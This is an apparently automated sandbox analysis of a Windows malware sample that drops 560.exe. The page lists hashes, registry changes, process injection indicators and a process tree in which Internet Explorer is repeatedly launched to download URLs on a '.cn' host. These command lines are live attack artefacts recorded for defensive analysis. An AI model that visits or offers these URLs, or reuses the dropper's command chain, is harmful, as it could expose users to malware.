7cf40a87705f859c9727f25bce00b9077c5a4dfa86b68580dd8e2285ae30814c

Analysis

max time kernel
146s
max time network
141s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04-02-2024 18:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8fcbbaedce2ec6590cb73f278cb574e3.exe
Size

18KB
MD5

8fcbbaedce2ec6590cb73f278cb574e3
SHA1

4b6da813b614fed174815cf907193a726a02ca80
SHA256

7cf40a87705f859c9727f25bce00b9077c5a4dfa86b68580dd8e2285ae30814c
SHA512

5c7a2ef88326bdc4c3fb7a9aa140fa67f19275506979396d12cf4a1957f27e84c4364ce107f457edcf7f4ca9382c0af10b851697ae6bc54cd8afde1ece6ef3df
SSDEEP

384:lmY8VgECNbENUKy1b7o0OTx/A+hpedcgm3PhgruDuVYBNsJd6k:N8Vg3Nb8S89oc0dcgESuDcY0P6

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2700	560.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\560.exe	8fcbbaedce2ec6590cb73f278cb574e3.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5706AA81-C387-11EE-9AF4-C2500A176F17} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{65A95EC1-C387-11EE-9AF4-C2500A176F17} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4F1A9701-C387-11EE-9AF4-C2500A176F17} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{92BB0761-C387-11EE-9AF4-C2500A176F17} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5F8D7761-C387-11EE-9AF4-C2500A176F17} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2864	IEXPLORE.EXE
1132	IEXPLORE.EXE
1084	IEXPLORE.EXE
1980	IEXPLORE.EXE
2384	IEXPLORE.EXE
1444	IEXPLORE.EXE
2356	IEXPLORE.EXE
2392	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
2520	8fcbbaedce2ec6590cb73f278cb574e3.exe
2700	560.exe
2864	IEXPLORE.EXE
2864	IEXPLORE.EXE
3032	IEXPLORE.EXE
3032	IEXPLORE.EXE
1132	IEXPLORE.EXE
1132	IEXPLORE.EXE
2928	IEXPLORE.EXE
2928	IEXPLORE.EXE
1084	IEXPLORE.EXE
1084	IEXPLORE.EXE
2096	IEXPLORE.EXE
2096	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
368	IEXPLORE.EXE
368	IEXPLORE.EXE
368	IEXPLORE.EXE
368	IEXPLORE.EXE
2384	IEXPLORE.EXE
2384	IEXPLORE.EXE
1524	IEXPLORE.EXE
1524	IEXPLORE.EXE
1444	IEXPLORE.EXE
1444	IEXPLORE.EXE
780	IEXPLORE.EXE
780	IEXPLORE.EXE
780	IEXPLORE.EXE
780	IEXPLORE.EXE
2356	IEXPLORE.EXE
2356	IEXPLORE.EXE
1812	IEXPLORE.EXE
1812	IEXPLORE.EXE
2392	IEXPLORE.EXE
2392	IEXPLORE.EXE
2340	IEXPLORE.EXE
2340	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2700	2520	8fcbbaedce2ec6590cb73f278cb574e3.exe	29
PID 2520 wrote to memory of 2700	2520	8fcbbaedce2ec6590cb73f278cb574e3.exe	29
PID 2520 wrote to memory of 2700	2520	8fcbbaedce2ec6590cb73f278cb574e3.exe	29
PID 2520 wrote to memory of 2700	2520	8fcbbaedce2ec6590cb73f278cb574e3.exe	29
PID 2700 wrote to memory of 2864	2700	560.exe	30
PID 2700 wrote to memory of 2864	2700	560.exe	30
PID 2700 wrote to memory of 2864	2700	560.exe	30
PID 2700 wrote to memory of 2864	2700	560.exe	30
PID 2864 wrote to memory of 3032	2864	IEXPLORE.EXE	31
PID 2864 wrote to memory of 3032	2864	IEXPLORE.EXE	31
PID 2864 wrote to memory of 3032	2864	IEXPLORE.EXE	31
PID 2864 wrote to memory of 3032	2864	IEXPLORE.EXE	31
PID 2700 wrote to memory of 1132	2700	560.exe	33
PID 2700 wrote to memory of 1132	2700	560.exe	33
PID 2700 wrote to memory of 1132	2700	560.exe	33
PID 2700 wrote to memory of 1132	2700	560.exe	33
PID 1132 wrote to memory of 2928	1132	IEXPLORE.EXE	34
PID 1132 wrote to memory of 2928	1132	IEXPLORE.EXE	34
PID 1132 wrote to memory of 2928	1132	IEXPLORE.EXE	34
PID 1132 wrote to memory of 2928	1132	IEXPLORE.EXE	34
PID 2700 wrote to memory of 1084	2700	560.exe	38
PID 2700 wrote to memory of 1084	2700	560.exe	38
PID 2700 wrote to memory of 1084	2700	560.exe	38
PID 2700 wrote to memory of 1084	2700	560.exe	38
PID 1084 wrote to memory of 2096	1084	IEXPLORE.EXE	39
PID 1084 wrote to memory of 2096	1084	IEXPLORE.EXE	39
PID 1084 wrote to memory of 2096	1084	IEXPLORE.EXE	39
PID 1084 wrote to memory of 2096	1084	IEXPLORE.EXE	39
PID 2700 wrote to memory of 1980	2700	560.exe	40
PID 2700 wrote to memory of 1980	2700	560.exe	40
PID 2700 wrote to memory of 1980	2700	560.exe	40
PID 2700 wrote to memory of 1980	2700	560.exe	40
PID 1980 wrote to memory of 368	1980	IEXPLORE.EXE	41
PID 1980 wrote to memory of 368	1980	IEXPLORE.EXE	41
PID 1980 wrote to memory of 368	1980	IEXPLORE.EXE	41
PID 1980 wrote to memory of 368	1980	IEXPLORE.EXE	41
PID 2700 wrote to memory of 2384	2700	560.exe	43
PID 2700 wrote to memory of 2384	2700	560.exe	43
PID 2700 wrote to memory of 2384	2700	560.exe	43
PID 2700 wrote to memory of 2384	2700	560.exe	43
PID 2384 wrote to memory of 1524	2384	IEXPLORE.EXE	44
PID 2384 wrote to memory of 1524	2384	IEXPLORE.EXE	44
PID 2384 wrote to memory of 1524	2384	IEXPLORE.EXE	44
PID 2384 wrote to memory of 1524	2384	IEXPLORE.EXE	44
PID 2700 wrote to memory of 1444	2700	560.exe	45
PID 2700 wrote to memory of 1444	2700	560.exe	45
PID 2700 wrote to memory of 1444	2700	560.exe	45
PID 2700 wrote to memory of 1444	2700	560.exe	45
PID 1444 wrote to memory of 780	1444	IEXPLORE.EXE	46
PID 1444 wrote to memory of 780	1444	IEXPLORE.EXE	46
PID 1444 wrote to memory of 780	1444	IEXPLORE.EXE	46
PID 1444 wrote to memory of 780	1444	IEXPLORE.EXE	46
PID 2700 wrote to memory of 2356	2700	560.exe	48
PID 2700 wrote to memory of 2356	2700	560.exe	48
PID 2700 wrote to memory of 2356	2700	560.exe	48
PID 2700 wrote to memory of 2356	2700	560.exe	48
PID 2356 wrote to memory of 1812	2356	IEXPLORE.EXE	49
PID 2356 wrote to memory of 1812	2356	IEXPLORE.EXE	49
PID 2356 wrote to memory of 1812	2356	IEXPLORE.EXE	49
PID 2356 wrote to memory of 1812	2356	IEXPLORE.EXE	49
PID 2700 wrote to memory of 2392	2700	560.exe	51
PID 2700 wrote to memory of 2392	2700	560.exe	51
PID 2700 wrote to memory of 2392	2700	560.exe	51
PID 2700 wrote to memory of 2392	2700	560.exe	51

C:\Users\Admin\AppData\Local\Temp\8fcbbaedce2ec6590cb73f278cb574e3.exe
"C:\Users\Admin\AppData\Local\Temp\8fcbbaedce2ec6590cb73f278cb574e3.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\560.exe
  C:\Windows\560.exe -r
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t1.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:00:41 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3032
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t1.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:00:55 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1132 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2928
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t1.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:01:09 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1084 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2096
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t1.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:01:19 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1980 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:368
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t2.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:01:52 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2384 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1524
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t2.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:02:03 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1444 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:780
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t2.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:02:35 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2356 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1812
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://t2.05885.cn//down8/down/?s=C5E3C09DAFB2A3B2B4BED6A286DBBEAD&t=2/4/2024 6:02:52 PM&v=C1D3B8E3B1B191A4B3BEBCA1&n=C9BFD1BAB7D9D1C2BCBFABAD
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:2392
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2392 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4F1A9701-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
9bb55cbb1dc4093040c9d7bfbf020199

SHA1
ba8e73724ba0dffced0f9f27906330f59f4add71

SHA256
d42880216510d7fe445d7f47f15d71eee864e9781beebb198f6f1c43c7971ee5

SHA512
14683cd55931398abc419e4367fa221467aa730c11a999dcf682a736669645ff6340daa1f484f562c4525208e3a53c65d67fc5f30afb7bbf0ae26fec53f614d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5706AA81-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
8625cff7a09dea7a640317831cc2ef91

SHA1
723fdca1f60ef536eeeb59599582fec8ecbe215d

SHA256
fde7eb1fa7952aeac2faf5ca24fa11365416026d79eacf088861fc77c56e58be

SHA512
62546fe63c96183d544e28382498ee5420698aa87bd7847f50eddb89636dd82298a4d114037a7e48910d52b65304e4bf16baadd3f1a5e48e2df16ec6af7e29df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5F8D7761-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
ce09b2e3c6edcd290740337fd7479af7

SHA1
4cb49b55e5bb12b79f4b266da3c482f681b8745e

SHA256
daad187e982d400a603668850316ade6431554b79da08bd554fdd4a51d2de37d

SHA512
7b30281c9b3ff23b300bcb06b2c8a1ddde96dc69fd394320ad1df57738d96014598109bc95e109ec58cb51ee7fa91be36f4730903541adfff6602bae4e941ea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{65A95EC1-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
79639aac940cb496422b6d536d67275b

SHA1
9bf52fa578eaf9d719dc14af8043bb4b71412321

SHA256
9bb8d1e7a614a81209cbc95066e9247219476c728e8721b5c685787813089091

SHA512
1f9b224cf13a5f87c9041d9e40203c15e51571cec2d4df71aa9dccac46afe40d205ae999861369a1200ebd7e5e70ec22d860b9149017a9e342afd44157c1b967

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{78E8BD01-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
dc8b9ee18a1be013f067b0f96564cf7b

SHA1
0d725e6d7111e5eca35d94cddc090721b30b69ae

SHA256
c8bb67da02b8f8e24d64487616ec8a8badb7ca5756518d8c6f95e263940bfdb9

SHA512
892fa0e8d2d3583f72ff6532573f6276b7161e2e4959f965c4018c8dd8fdb7979e0a889c7a384c970de7c7e3ede1d15184e1bd608edf7b96b3cea42a0a651311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7F82CD41-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
06a1c3b7cf2862d589e4c1dfaa33cf6e

SHA1
d255064453b2cdef0b3be3ceb17e6ad8732925f9

SHA256
d42f90316d3d54a36f845b9dc08ce113615f71836ca9c8005905f0cdb60a75b4

SHA512
05ea7e876b0fed21c600f2ef1db32b3cdb8013a79972ba478c903dc3a7338e21927f8ed50f908447bb492a0a656bf4cb4c92d76261465af33f99faf94cbbdc49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{92BB0761-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
5KB

MD5
0edef90184def7c5c94a4192b4b189b3

SHA1
530a0e5ec618b6148b4c58c38f4fd3d9738e45aa

SHA256
72deceaeb4b0d53e965c219e71dc5999c62693519a403cd7d10ffd2c042fbd6c

SHA512
ce18638ff54a474a336fd1dcba893bd2da31b41cd0f4ed01adad1c9ad5065b15306a6c5b9386476c7e61d897f512e60c6724071ad36202884b4d0da4f6c8344d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4F1A9703-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
4KB

MD5
f2dc3bdfac7cdc29dd52f5d7e124295c

SHA1
7b1624f0458f3d126c25f667500d4c9a1645fee5

SHA256
6f00b327743c6c4b5828e4ed7fe9bc8377fa12a3a64c20bb4fa2d12176351592

SHA512
9739a5a899cbddf7d670bca05101f5d7ecbc22981f36f45568e65fecf94635786f576f0ac7a8b5b47742fe9cbe611089d763fc362cdbc3a4851dd77aa92463cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5706AA83-C387-11EE-9AF4-C2500A176F17}.dat

Filesize
4KB

MD5
2959baf332e3aa79e286799232c66b3d

SHA1
465fe6330c284d54ac1c3428d861a067893023ef

SHA256
0ec9b66358832c4ab7ad229882e955f2fce109c00081bd4e01ce71ff2e1fa2b0

SHA512
